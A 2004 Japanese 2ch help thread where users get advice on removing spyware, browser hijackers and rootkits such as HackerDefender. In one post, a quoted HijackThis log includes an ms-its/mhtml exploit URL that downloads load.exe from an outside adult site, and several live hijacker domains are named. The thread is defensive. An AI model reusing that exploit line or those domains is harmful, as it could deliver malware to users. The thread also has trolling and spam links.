680 :ひよこ名無しさん:04/05/23 05:18 ID:i71RFeyp
677さん
スパイウェアをインストールして、駆除することはできたようなのですが
まだ書き換えることができません・・・。打つ手なしでしょうか(泣)

681 :678:04/05/23 05:18 ID:zhTlpLGv
失礼しました。
スパイウェア対策にspybot、ウイルス対策にウイルスバスターを入れてます。
重くなるので、2ちゃん観る位ならファイアウォールは無効にしてあります。
OSはXPです。

682 :678:04/05/23 05:20 ID:zhTlpLGv
ちなみに復元直後にウイルス、スパイウェア検索しても怪しいファイルは
見つかりません。

683 :ひよこ名無しさん:04/05/23 05:23 ID:???
>>680
スパイウェアをインストールして駆除とはどういった事でしょうか?
どんなソフトを入れたのか具体的に質問してください。

>>681
Ad-aware 6.0も入れて駆除してください。
あと、ファイアウォールを無効にするなんてとんでもない。
危険ですから絶対にやめて下さい。

684 :ひよこ名無しさん:04/05/23 05:28 ID:i71RFeyp
Ad-aware 6.0というやつで、スキャンかけたらいくつか出てきたんで
削除−OKという感じです。確認しようとしたら2回目は何も引っ掛かってなかったので
駆除できたと判断しましたが・・。

685 :ひよこ名無しさん:04/05/23 05:36 ID:???
>>684
調子に乗るなヴォケ

686 :ひよこ名無しさん:04/05/23 05:41 ID:???
きな臭いスレだ

687 :ひよこ名無しさん:04/05/23 05:44 ID:???
>>684=>>686
とうとう本性を現しますた。
皆さんスルーする様に。。

688 :ひよこ名無しさん:04/05/23 06:01 ID:???
>>687
いつまでこんなとこに張り付いてるつもりだ
このキモオタ

689 :ひよこ名無しさん:04/05/23 06:06 ID:???
>>688
心配してくれて有難う。
でも安心してくれ、お前みたいなキモヲタの為じゃないから。
分かったらとっととお前みたいな迷惑キモヲタは消えてくれ。


それだけだ。

690 :ひよこ名無しさん:04/05/23 06:12 ID:???
>>689
まぁまぁ、
こんな香具師はスルーすればええやん

691 :ひよこ名無しさん:04/05/23 06:13 ID:???
>>689
ダレモオマエナンカタヨリニシテイナイ

692 :ひよこ名無しさん:04/05/23 06:14 ID:???
>>690
傷のなめあいっこ乙

693 :ひよこ名無しさん:04/05/23 06:28 ID:???
オレノカチ

694 :ひよこ名無しさん:04/05/23 06:45 ID:???
オレノカチ

695 :ひよこ名無しさん:04/05/23 06:53 ID:???
イイヤオレノカチ

696 :ひよこ名無しさん:04/05/23 07:00 ID:???
イヤイヤオレノカチ

697 :ひよこ名無しさん:04/05/23 07:20 ID:???
ヤッパリオレノカチジャネーカ

698 :ひよこ名無しさん:04/05/23 07:33 ID:???

詳しいことは知らんが俺の勝ちでいいだろ!!

699 :ひよこ名無しさん:04/05/23 07:36 ID:???
俺だっていろいろ大変なんだぞ
明日どの店行こうとか
あぁ今日閉店コースだ、借りてるエロビデオまた返せないやとか
いろいろ考えてるんだぞ


・・・まーアレだ、頑張れ

700 :ひよこ名無しさん:04/05/23 08:05 ID:???
オレノカチ

701 :ひよこ名無しさん:04/05/23 08:11 ID:???
ばかやろう、勝ったのは俺にきまってるだろ
おまいらみんな歯医者だ!!

702 :ひよこ名無しさん:04/05/23 08:15 ID:???
リーマン子持ち、貯金の余裕なんてありゃしねー
リストラどころか、次の給料、ナスの不安で胃が痛ぇ〜
それにくらべりゃ、あんたら幸せだなー、裏山しいよ、ほんと
オ気楽なもんだ、

703 :ひよこ名無しさん:04/05/23 08:24 ID:???
( ゚Д゚)<おまいらおはよ〜〜ございます!!

704 :ひよこ名無しさん:04/05/23 08:32 ID:???
オレノカチ

705 :ひよこ名無しさん:04/05/23 08:40 ID:???
2時間前に起きて、やっと課題終わったーー!!

706 :ひよこ名無しさん:04/05/23 09:19 ID:2Cw7xqhk
やっと直った。
アダルト見てて地雷を踏んだ。
ホームページが例のsecure、再起動の繰り返し、処理速度がものすごく(文書ファイル開くのに10分以上)遅くなるその他。
システム構成ユーティリティのスタートアップを最低限のチェックに。
最新のウイルス撃退ソフトをダウンロード(ノートン入れてるんだけど・・・)
OSの最新バージョンをダウンロード
最後にインターネットオプションのホームページを今までのものにしたら、オオ!!、直った。

707 :706:04/05/23 09:22 ID:2Cw7xqhk
追加
ダウンロードの前に、システムツールで「システムの復元」をした。

708 :ひよこ名無しさん:04/05/23 09:22 ID:???
カッタノハ オ・レ・ナ・ン・ダ・ヨ

709 :961:04/05/23 09:52 ID:???
>>639
レスを貰ってるのに何故やらないのか?
まず>>644のレジストリエントリをチェックすること。
ただSystemじゃない可能性もあるからその場所にある値を全てここに書き出す。

IEの一時ファイルとクッキー削除を行う

上が終わったら下のエントリをHaijackThis以外を閉じた状態でFix
O2 - BHO: (no name) - {CF021F40-3E14-23A5-CBA2-717765721306} - C:\WINDOWS\SYSTEM\WER1306.DLL
O4 - HKLM\..\Run: [DXM6Patch_981116] C:\WINDOWS\p_981116.exe /Q:A
O4 - HKLM\..\Run: [System Backup] ms32.exe
O4 - HKLM\..\Run: [Services Process] C:\WINDOWS\system32\config\services.exe
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://petite-virgins.biz/dl/ms/x.chm::/load.exe

常駐ウイルスソフトを入れる(既にトロイに感染してるっぽい)
とりあえず最新パターンでオンラインスキャンと>>267のトロイ発見専用a2を実行

710 :ひよこ名無しさん:04/05/23 10:51 ID:???
>>706-707
お疲れさま。

711 :ひよこ名無しさん:04/05/23 12:04 ID:JVAmA65h
若干スレ違いなんだけど
スパイウェア除去ソフトって殆どが英語表記だよね。
日本語化するパッチあるけどうまく日本語化できなかった経験あり。
はじめから日本語に対応しているソフトとかないものかね?



712 :ひよこ名無しさん:04/05/23 12:05 ID:???
>>711
糞して寝ろヴォケ

713 :ひよこ名無しさん:04/05/23 12:07 ID:???
>>711
Spybotは日本語に対応だな

いずれにしてもスレ違い&板違い
【総合】スパイウェア予防駆除 Part3
http://pc5.2ch.net/test/read.cgi/sec/1083759490/

714 :ひよこ名無しさん:04/05/23 12:59 ID:aqL20hIq
OS:win2000、ブラウザ:IE6.0です。

一昨日からブラウザのホームページが「http://jksearch.biz/redir.php」に書き替えられ、
アドレスを変更できない症状にかかってしまいました。

このスレに示されてた応急処置や、その他駆除ツールなどを駆使しても
原因不明のまま、本日正午まで来てしまいました。

しかし、このスレの過去ログや、リンク先の対策サイトを読み進めるうちに、
ついに、「c:\WINNT\system32\system32.dll」を削除することで、上の症状が
改善された事を確認することができました!

皆さまのお蔭で、ようやく睡眠をとることができます。
ありがとうございました>ALL

では、おやすみなさい・・・

715 :初心者です!:04/05/23 13:12 ID:AN0Mkww8
すいません。さっきはスレ違いだったみたいで・・・・
ここに書きます。

IEのプロパティーの全般タブのホームページのURLの欄に、
おかしな海外のシェアソフトサイトのURLが勝手に出てしまします。
何回他のサイトのURLを入力してホームページ登録してもダメです。
おかしなプログラムが入ったのでしょうか?

すいませんが、どうすればいいのか教えて下さい!!

716 :ひよこ名無しさん:04/05/23 13:18 ID:???
>>715
質問のしかたが読めない人は帰ってください。

717 :ひよこ名無しさん:04/05/23 13:19 ID:???
>>715
>>1から順に読んでいくといい

718 :初心者です!:04/05/23 13:22 ID:AN0Mkww8
>>717
ありがとう。
読んでみますね。

719 :ひよこ名無しさん:04/05/23 13:28 ID:ddbpki9P
すまん、多分ウイルスだと思うのだが、
SPY−BOTのサイトに行くとウインドウが閉じる(例の奴)にかかってしまった。
セーフモードで、怪しいところは削除したら、悪さはしなくなったが、
ブラウザはジャックされたまま。。

一応自力で、SPY−BOTのDLに成功したが、あるべきところに何故か確認できず・・
(別PCのネットワークラインでみると、ちゃんと存在しているから不思議だ。)
とりあえず、別PCでSPY−BをDLして、ネットワークで引っ張ろうとしたが、
これもやはり、表示されず。 
なんとか、打開策(OS入れ替え以外で)インストする方法ないでしょうか?

720 :ひよこ名無しさん:04/05/23 13:28 ID:???
>>714
639 ◆7nVWiBpJOcさんかな?
起きたら今度はウイルス対策ソフト買ってPCに入れて置いておいた方がいいよ。
まあ、とりあえずお疲れさま。

721 :ひよこ名無しさん:04/05/23 13:33 ID:???
>>719
別PCでダウソ

CDRに焼く

ってのはダメかな?

722 :961:04/05/23 13:33 ID:???
>>719
コマンドプロンプトから
net stop HackerDefender100
を実行

その後にSpyBot見えるようになってるか確認

723 :ひよこ名無しさん:04/05/23 13:54 ID:ekBJNLQ4
java_bytever.aというウィルスに感染してるようなのですが
ウィルスバスター2004で駆除できないらしく、TrendMicroのサイトに行っても
そのまま削除して下さい。と書いてあるだけで肝心の削除対象ファイル?がどこにあるか
分かりません・・・色々検索してみたのですがどうにも分からないので、指南いただけたらと思います

724 :ひよこ名無しさん:04/05/23 14:06 ID:???
>>723
インターネットオプション>ファイルの削除

725 :ひよこ名無しさん:04/05/23 14:11 ID:???
>>723
マニュアル読んだのか?

726 :ひよこ名無しさん:04/05/23 14:18 ID:???
>>723
trendmicroのJAVA(SymantecではJS)で始まるウイルス名は正確には
ウイルスではなく、そのまま悪質なJAVAスクリプトを指す言葉。
ブラクラとか踏んでも検出される時もあるが基本的には724さんの、
言うとうりの対応で消えるはず。覚えておくと便利。

727 :719:04/05/23 14:18 ID:ddbpki9P
>>721
やってみます
>>722
ありがとう、コマンドプロンプトはまだ私は良く分からないのですが
勉強してみようとおもいます。

728 :719:04/05/23 14:20 ID:ddbpki9P
>>722
でました!でました!ちょっと感動しました!

729 :719:04/05/23 14:23 ID:ddbpki9P
かなり悲しい結果が出たので報告します。
spy−botの表示はちゃんとされました、が、インストール途中に
突然消えてしまいます! ガビ〜〜ン!!

730 :ひよこ名無しさん:04/05/23 14:26 ID:???
jksearch.biz/redir.php関連だと思うのですが
当方はcashsearch.biz/redir.phpでした。(School-fuckに飛ばされました)
>>337様の方法を参考にさせていただき
HiJackで当該ファイルをFixし、その後Regeditでcashsearchを検索して
該当するhttp://cashsearch.biz/redir.phpをすべてヤフーに書き換えた所
やっとこさ元に戻りました。
因みに環境はWIN98でIE6です。
>>337様本当に助かりました、ありがとうございます。

731 :730:04/05/23 14:28 ID:???
>>730のアドレスには飛ばないようお願いします。
スパイウェアとトロイの乱舞です。

732 :961:04/05/23 14:34 ID:???
>>719
SpyBot見えるようになっていればステルス機能は解除されているので各種悪さファイルも発見出来る。

Windowsディレクトリに変な*.sysファイルがあるはず(事例:hxdefdrv.sys)。名前をメモっといてからゴミ箱へ

次にWindowsディレクトリ内から怪しい*.iniファイルを探す。
ファイルに含まれる単語または文字列で[Hidden Table]をキーワードにして検索
見つかったらそのiniファイルをエディタで開いて全てここにコピペだ。

733 :ひよこ名無しさん:04/05/23 14:56 ID:cbd+Q43J
エロサイトで遊んでお金払わずに放置したって人いる?
相手に知られてるのは、携帯番号とプラバメール何だけど
やっぱ住所ばれるのかな?身辺調査から債権回収措置へと移行らしいが
毎日警告くるんだが、どうなるんだろ?

734 :ひよこ名無しさん:04/05/23 15:11 ID:???
>>733
>>1

735 :ひよこ名無しさん:04/05/23 15:17 ID:???
>>733
金払いたくなきゃ放置すればいいじゃん。どうなっても俺は知らんが。

736 :ひよこ名無しさん:04/05/23 15:23 ID:???
オレノカチ

737 :ひよこ名無しさん:04/05/23 15:39 ID:WhP0/oOo
どーもです、ありがとうございました

738 :ひよこ名無しさん:04/05/23 15:42 ID:???
誰???

739 :719:04/05/23 16:24 ID:ddbpki9P
ども、[Hidden Table]、hxdefdrv.sys、sysファイル、iniファイル
ともWINDOWSディレクトリ内を検索しましたが、hitしませんでしたね〜
まだステルス化してるみたいです。(spybotインスト出来ないので・・)
なんか「system32」のファイル内が怪しい〜のですが、もうかなりむかつきますね。
でも、変なとこ飛んだり、勝手にウインド開いたりはしなくなりました。

740 :ひよこ名無しさん:04/05/23 16:46 ID:6y1Cbo0D
パソコン初心者総合質問スレッドvol.720
http://pc5.2ch.net/test/read.cgi/pcqa/1085295591/
から誘導されてきました。
システム:
Microsoft Windows XP
Home Edition
Version 2002
Service Pack 1

Internet Explorer Version: 6.0.2800.1106.xpsp2.030422-1633
使用です。
Googleで検索しても目的のページに飛べないのですがどうしたらよろしいですか?
トップページで文字を入れて検索ボタンを押す→検索結果一覧が表示される→ひとつ選択する→トップページへ逆戻り(上に表示されるアドレスは変わっている。)→更新してもそのまま
といった感じです。
Spybot-S&Dや、インターネットオプションなどまとめページに書いてあることを試してみましたが改善されません
解決方法を教えてください。

741 :ひよこ名無しさん:04/05/23 16:54 ID:???
検索して、デットリンクになった時にページ検索のところに飛ばずに
いきなり0-168.comとかいう謎のページに飛ぶようになってしまったんですが
窓の手見ても、検索ページ設定のままだしどうすればいいか分かりません。

742 :719:04/05/23 16:55 ID:ddbpki9P
あのさ、おれも最近ウイルス感染して、状況がかなり良くなったから
アドバイスになればいいかと思うんで言うけど、

セーフモードで起動、怪しいファイルを手動削除(これで95%直った、俺のバヤイ)

で大体は直ったよ。以上

743 :741:04/05/23 16:56 ID:???
フォーマットしたら綺麗サッパリなくなりました。ありがとうございました。(・∀・)

744 :ひよこ名無しさん:04/05/23 17:15 ID:???
  [二二]__  流石だよな俺ら
  (,,´ー`)  (゚∀゚,,)
_(__つ/ ̄ ̄/  i)
  \./__/ ̄ ̄ ̄

745 :ひよこ名無しさん:04/05/23 17:38 ID:vv7mKY5T
初心者質問スレから誘導されました。
InternetExploreを開くと変なところに飛ばされます。
設定を直しても電源付け直すとまた戻ってしまいます。
どうしたらなおるでしょうか?

746 :ひよこ名無しさん:04/05/23 17:39 ID:???
《応急処置》

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware  http://www.dream-seed.com/server/spy.html (更新頻度高)
 c) Spybot-S&D http://www.dream-seed.com/server/spybot.html (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

747 :ひよこ名無しさん:04/05/23 17:41 ID:???
http://www.geocities.jp/ooooooxoooooojp/
お金がほしい人、一緒に頑張ろうよ!!

748 :ひよこ名無しさん:04/05/23 17:44 ID:???
よ〜し稼ぐぞ〜

749 :ひよこ名無しさん:04/05/23 18:17 ID:???
>>745
それ俺と同じだ
たぶんお気に入りに変なサイト入れられてるよ

750 :ひよこ名無しさん:04/05/23 18:58 ID:RGeATtp/
すいませんが変なウイルスに引っかかってしまいました
当方のPCはWindows XPでウイルス名はTROJ_ISTBAR、DWと出ています
テンプレ当に記載していましたら申し訳有りませんが、自分が見た限り良く分かりませんでした
PC初心者で申し訳有りませんが、親切な方どうか教えていただけませんか?

751 :ひよこ名無しさん:04/05/23 19:01 ID:???
>>750
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_ISTBAR.DW



752 :961:04/05/23 19:03 ID:???
>>719
コマンド入れた以降に再起動したりネットに繋いでる?
出来るところまではネット切断した状態で一気にやった方が良い

>>750
検索くらいしてから質問だ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_ISTBAR.DW

753 :961:04/05/23 19:09 ID:???
>>740
>>下記スレッドのFAQを行なっても変わりなければそちらで相談。

誘導元でこう言われている訳だが、このスレのテンプレ内をどこまでやったのか?

754 :ひよこ名無しさん:04/05/23 19:13 ID:RGeATtp/
>>751-752
大変有難うございました
感謝してます

755 :ひよこ名無しさん:04/05/23 19:19 ID:f8MNh0Ki
アドレスバーがいつの間にかなくなっていて、表示→ツールバー→アドレスバー
とクリックしても出てきません。。どうすればだせますか??
親切な方教えてください、おねがいします!

756 :ひよこ名無しさん:04/05/23 19:20 ID:f8MNh0Ki
↑すいません、スレまちがえた・・・

757 :ひよこ名無しさん:04/05/23 19:46 ID:???
>>750
●【緊急】 早く治したい方は以下を実行して下さい 【処置】●

WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

1)IEのホーム、検索ページを標準に戻す→ツール→
インターネットオプション→プログラム→WEB設定のリセット
2)IEの履歴削除→ツール→インターネットオプション→全般→
インターネット一時ファイル→クッキーの削除+ファイルの削除
3)削除したいファイルがあるが「アクセスできません。使用中です」等と
いわれて削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
4)勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
  http://users.hoops.ne.jp/ee94012/hayanet21st/index-1.htm  →OS再起動
6)定番スパイウェア除去ソフト↓をインストール(併用推奨)

 ・定番 スパイウェア除去ソフト Ad-Aware 使用法
  http://www.oct-net.ne.jp/~missile/altoegoh/r.htm
 ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
  http://perso.wanadoo.es/lsmagsupermix1/

7)Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
 [スタート]→[すべてのプログラム]→
 [アクセサリ]→[システム ツール]→[システムの復元]


758 :ひよこ名無しさん:04/05/23 20:00 ID:???
>>750
《応急処置》

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware  http://www.dream-seed.com/server/spy.html (更新頻度高)
 c) Spybot-S&D http://www.dream-seed.com/server/spybot.html (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

759 :ひよこ名無しさん:04/05/23 21:08 ID:PHcJTKxE
パソコン初心者総合質問スレッドvol.720から誘導されてこちらに来ました

パソコンにスパイウェアとか入ってるみたいで、ウィルスバスター入れたんですけど…
PC起動するたびに「ウィルス/スパイウェアが見つかりました」って出ます。
おまけにサイト観覧してる時にクリックしたのと全然違うサイト(アダルト)がしょっちゅう出て困ってます。
こういったものを一気に無くす方法ってあるんでしょうか。
その影響かは定かではないのですがホームのサイトを何度登録しなおしても
エクスプローラー閉じてまた開くとblankになっます。
どうすればいいでしょうか…
XPのPCでInternet Explorer を使っています

760 :ひよこ名無しさん:04/05/23 21:10 ID:???
まぁたまにはゆっくり>>1から読み返してみるのもいいもんだと思うぞ。どうだ?

761 :ひよこ名無しさん:04/05/23 21:11 ID:???
>>759
せめて真上くらい読めよ

762 :ひよこ名無しさん:04/05/23 21:12 ID:???
>>759
よく見ろよ。>>427に誘導してんだぞ。誰もコピペしろとは言ってないぞ。

763 :ひよこ名無しさん:04/05/23 21:19 ID:clAwZSPw
エロサイトで変なプログラムを拾ってしまいました。
起動時に「Windows Updateの再設定」というプログラムが勝手に起動してしまいます。
それはスタートアップから削除し、プログラムの本体も削除したのですが
しかしエクスプローラーが起動せず、ホームページがエロサイトに設定されていて
余計な負荷も掛かっている様でまだ、何か残っているみたいでしたので
プログラムの強制終了を開いて見てみると
「Seksdialer」という見覚えの無いプログラムが常駐していました。
しかし、コントロールパネルからアプリケーションの追加と削除を見てみても
それらしきプログラムは見つかりませんでした。
このプログラムの削除方法と何が負荷を掛けているか教えてください。

764 :ひよこ名無しさん:04/05/23 21:23 ID:???
>>763
>>1

765 :ひよこ名無しさん:04/05/23 21:24 ID:???
復元してもスパイウェアは残るんですか?

766 :ひよこ名無しさん:04/05/23 21:42 ID:amRMkjHT
トロイらしきものにひっかかったんですが、初期化以外に直る方法はあるのでしょうか?

767 :763:04/05/23 21:43 ID:clAwZSPw
>>764
ある程度、自分でやってみて挫折しました。
どうかお願いします…_| ̄|○

768 :ひよこ名無しさん:04/05/23 21:45 ID:???
>>766
>>427

769 :ひよこ名無しさん:04/05/23 21:46 ID:???
>>766
何故トロイだと判明したか、そのトロイは名は?
それを書かないと初期化以外ない

>>767
何と何をやった?

770 :ひよこ名無しさん:04/05/23 21:47 ID:???
エロサイト踏んだらisearchってツールバー出てきて消えない…
どうすればいいですか?


771 :ひよこ名無しさん:04/05/23 21:48 ID:???
>>770
>>1から読む

772 :770:04/05/23 21:48 ID:???
あえて逆手に取り、利用する事にしました(・∀・)

773 :ひよこ名無しさん:04/05/23 21:48 ID:???
http://www.isearch.com/faq.php

774 :ぼるじょあ ◆yBEncckFOU :04/05/23 21:49 ID:???
>>772
(・3・) エェー がんばってくださいNE

775 :763:04/05/23 21:52 ID:clAwZSPw
>>769
>>1のサイトの応急処置の1〜6までを。
7は英語がさっぱりなのでなんとも…
8はOSがWin98seなのでできませんでした。

776 :766:04/05/23 21:53 ID:amRMkjHT
友達に話したらそう言ってました。
名前ってどうすればわかるんですか?

777 :ひよこ名無しさん:04/05/23 21:55 ID:???
その友達に聞けばわかるでしょ

778 :766:04/05/23 21:56 ID:amRMkjHT
いえ、友達も症状を知ってるだけで、対処法は知らないそうです。


779 :770:04/05/23 21:59 ID:ZpnUxYoz
すいません、あせってました。
最初から見て、それでも分からなかったらまた来ます

780 :ひよこ名無しさん:04/05/23 22:09 ID:???
>>775
Ad-awareの使い方
http://www.dream-seed.com/server/spy.html
Spybotの使い方
http://www.dream-seed.com/server/spybot.html

>>778
ここの>>1を読んで実行

【初心者向】ウイルス対策ソフト質問スレ part2
http://pc5.2ch.net/test/read.cgi/pcqa/1073885296/

>>779
ガンガレ


781 :770:04/05/23 22:14 ID:ZpnUxYoz
解決しました!
どうもご迷惑をおかけしました
今後こんなことが無いように気をつけます
有難うございました

782 :ひよこ名無しさん:04/05/23 22:16 ID:???
>>781
おめでと

783 :ひよこ名無しさん:04/05/23 22:30 ID:uHriBoMT
  三|三
  イ `<             ,..-──- 、         _|_
   ̄             /. : : : : : : : : : \        |_ ヽ
   ∧           /.: : : : : : : : : : : : : : ヽ      (j  )
   /  \        ,!::: : : :,-…-…-ミ: : : : :',
              {:: : : : :i '⌒'  '⌒' i: : : : :}     _ヽ_∠
  └┼┘          {:: : : : | ェェ  ェェ |: : : : :}       lニl l |
.   |_|_|  , 、      { : : : :|   ,.、   |:: : : :;!      l─| l 亅
   __   ヽ ヽ.  _ .ヾ: :: :i r‐-ニ-┐ | : : :ノ        _
    /     }  >'´.-!、 ゞイ! ヽ 二゙ノ イゞ‐′      l  `ヽ
   ´⌒)    |    −!   \` ー一'´丿 \       l/⌒ヽ
    -'    ノ    ,二!\   \___/   /`丶、      _ノ
        /\  /    \   /~ト、   /    l \
       / 、 `ソ!      \/l::::|ハ/     l-7 _ヽ
      /\  ,へi    ⊂ニ''ー-ゝ_`ヽ、    |_厂 _゙:、
      ∧   ̄ ,ト|    >‐- ̄`    \.  | .r'´  ヽ、
     ,ヘ \_,. ' | |    丁二_     7\、|イ _/ ̄ \
     i   \   ハ       |::::|`''ー-、,_/  /\_  _/⌒ヽ


784 :740:04/05/23 22:31 ID:t/vFfMLh
>>753
とりあえず、>>1に書いてあるまとめサイトというところに行って
IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→プログラム→WEB設定のリセット
IEの履歴削除→ツール→インターネットオプション→全般→インターネット一時ファイル→クッキーの削除+ファイルの削除
ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをダウン→実行(こちら) →OS再起動
定番スパイウェア除去ソフトをインストール(併用推奨) (Ad-Aware &Spybot-S&D )
Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール] →[システムの復元]

上記を実行しました。下のほうはやろうにもどうすれば良いかがいまいち分からずいじっていません。
どうかよろしくお願いいたします。

785 :763:04/05/23 22:34 ID:clAwZSPw
>>780
教えていただいたサイトを参考にセットアップ作業を進めるのですが
>>763に書いた通り、PCに何処からかかなり負荷が掛かっており
セットアップ途中でフリーズし、再起動せざるを得なくなってしまいます。
それと、>>1のサイトの「CoolWebShredder」を実行したところ、
「Seksdialer」という見覚えの無いプログラムは常駐しなくなりました。
しかし、負荷は一向に直らず、ホームページも変更されたままです。

786 :ひよこ名無しさん:04/05/23 22:35 ID:???
>>785
うんこ臭いよ。

787 :ひよこ名無しさん:04/05/23 22:46 ID:???
>>785
msconfig開いてスタートアップのprogramって書いてあるのを全部停止

788 :ひよこ名無しさん:04/05/23 22:46 ID:???
>>785
msconfig開いてスタートアップのprogramって書いてあるのを全部停止

789 :ひよこ名無しさん:04/05/23 22:51 ID:GWzK/k98
さっきファ板でオタクファッション発見みたいなのを開いたら
ロリータBBSみたいなのに飛ばされました。
で、パソコンが重くなったんで再起動して
またインターネットのブラウザを開くと、アメリカのエロページに
飛ばされるようになりました。
こういう事は前にもあったので、コントロールパネルから
インターネットオプションの標準ページをYAHOOにしました。
しかしまたブラウザを開くとエロページに飛ばされてしまいます。
しかもインターネットをしていて少したつと
何もして無いのに変なブラウザが開かれ全画面表示になったりします。
これは何故なんでしょうか?
一応スパイウェアソフトは使って、スパイウェアは削除したんですが。
長文ですが誰か答えてください。

790 :ひよこ名無しさん:04/05/23 22:53 ID:???
>>789
>>1から読め

791 :ひよこ名無しさん:04/05/23 22:54 ID:???
>>789
ソフトはなに使ってんだ?

792 :766:04/05/23 22:56 ID:amRMkjHT
TROJ SMALL.FOとかいうのが出てきましたが、これでしょうか?

793 :ひよこ名無しさん:04/05/23 23:07 ID:???
《応急処置》

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware  http://www.dream-seed.com/server/spy.html (更新頻度高)
 c) Spybot-S&D http://www.dream-seed.com/server/spybot.html (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

794 :ひよこ名無しさん:04/05/23 23:11 ID:???
>>792

ウイルスバスターオンラインスキャン

http://www.trendmicro.co.jp/hcall/index.asp

795 :ひよこ名無しさん:04/05/23 23:16 ID:???
>>763
>>46

796 :ひよこ名無しさん:04/05/23 23:16 ID:???
同じコピペ繰り返す意味がわからん

797 :ひよこ名無しさん:04/05/23 23:19 ID:???
読まないヤツが多いから

798 :766:04/05/23 23:20 ID:amRMkjHT
>>794
それで検索したら、さっきのものが出てきました。これがトロイの名前?
システムの復元でも直るのでしょうか?

799 :ひよこ名無しさん:04/05/23 23:34 ID:???
>>798
治るよ。

800 :ひよこ名無しさん:04/05/23 23:36 ID:???
>>798
TROJ_SMALL.FO
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SMALL.FO

801 :ひよこ名無しさん:04/05/23 23:47 ID:KuMBelqO
HPがttp://world-search.biz/に設定されてしまい、
CoolWebShredderのソフトをダウンロードしようにも出来ないので
他のパソコンからダウンロードしたやつをCDRに焼いてみたのですが
ttp://world-search.biz/に設定したPCからみるとCoolWebShredder
が見えません。(他のPCではちゃんと見えます)

■アダルトサイト被害対策の部屋
 http://higaitaisaku.web.infoseek.co.jp/
に行っても途中でIEが終了してしまいます。
WEB設定のリセットやクッキー削除しても一時的に直るだけで
すぐ元に戻ってしまいます。

WINDOWS2000です。
どうしたらよいでしょうか?

802 :ひよこ名無しさん:04/05/23 23:51 ID:???
>>801
あやしいプロセスやスタートアップを止める。


803 :ひよこ名無しさん:04/05/24 00:00 ID:ScTpEor2
ttp://www.border.jp/uploader/upload.php
↑のサイトの[4432.jpg][4433.jpg]を開いたら
何かを勝手にDLし始め、
それ以降エロサイトらしき物が再起動するたびにあらわれて
アンインストしても復活して困っています。
テンプレサイトの試せるものは一通り試しましたが、
どれも上手くいきませんでした、どなたか解決法お願い致します。


804 :338:04/05/24 00:12 ID:7jK+wz63
>>555
